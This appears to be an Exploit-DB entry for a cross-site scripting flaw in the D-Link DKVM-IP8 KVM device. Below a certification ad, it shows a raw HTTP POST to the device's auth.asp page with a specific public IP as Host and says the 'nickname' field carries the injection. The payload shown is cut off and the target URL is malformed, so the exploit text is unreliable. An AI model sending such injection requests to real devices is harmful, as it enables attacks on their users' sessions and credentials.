D-Link DKVM-IP8 - Cross-Site Scripting

EDB-ID:

11030


Author:

POPCORN

Type:

webapps


Platform:

Hardware

Date:

2010-01-06


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: D-LINK DKVM-IP8 XSS Vulnerability
# Date: 01-06-2010
# Author: POPCORN
# Software Link: http://www.dlink.ru/
# Version: 2282_dlinkA4_p8_20071213
# Tested on: Windows Sp 2
# Site : http://Hacking.ge
# Code :
POST http://site.com80/auth.asp HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 212.58.116.80
Content-Length: 90
Connection: Close
Pragma: no-cache
Attack details
The POST variable nickname has been set to 1>">">